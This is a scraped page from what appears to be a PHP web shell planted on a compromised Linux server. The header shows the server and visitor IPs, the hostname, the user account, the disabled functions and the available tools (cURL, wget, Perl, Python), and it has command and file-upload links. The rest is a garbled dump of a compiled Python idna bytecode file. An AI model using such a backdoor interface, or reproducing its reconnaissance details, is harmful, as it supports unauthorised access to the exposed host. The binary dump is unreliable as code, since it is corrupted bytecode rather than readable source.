Server IP : 184.107.3.203 / Your IP : 216.73.216.51 Web Server : Apache System : Linux dedicated2.avenfashion.com.ph 4.18.0-553.40.1.el8_10.x86_64 #1 SMP Mon Feb 10 12:11:18 EST 2025 x86_64 User : adminteladeoro ( 1015) PHP Version : 8.2.28 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /usr/lib/python3.6/site-packages/idna/__pycache__/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
3 ��f�, � @ s> d dl mZ ddlZddlZddlZddlZd dlmZ dZdZ ej d�Zejd dkr`e ZeZG d d � d e�ZG dd� de�ZG d d� de�ZG dd� de�Zdd� Zdd� Zdd� Zdd� Zdd� Zdd� Zd7dd�Zd d!� Zd"d#� Zd$d%� Zd&d'� Z d8d(d)�Z!d*d+� Z"d,d-� Z#d.d/� Z$d9d1d2�Z%d:d3d4�Z&d;d5d6�Z'dS )<� )�idnadata� N)�intranges_contain� s xn--u [.。.。]� c @ s e Zd ZdZdS )� IDNAErrorz7 Base exception for all IDNA-encoding related problems N)�__name__� __module__�__qualname__�__doc__� r r �/usr/lib/python3.6/core.pyr s r c @ s e Zd ZdZdS )� IDNABidiErrorz= Exception when bidirectional requirements are not satisfied N)r r r r r r r r r s r c @ s e Zd ZdZdS )�InvalidCodepointz> Exception when a disallowed or unallocated codepoint is used N)r r r r r r r r r s r c @ s e Zd ZdZdS )�InvalidCodepointContextzE Exception when the codepoint is not valid in the context it is used N)r r r r r r r r r s r c C s t jt| ��S )N)�unicodedataZ combining�unichr)�cpr r r �_combining_class$ s r c C s t t| �tj| �S )N)r �ordr �scripts)r Zscriptr r r � _is_script'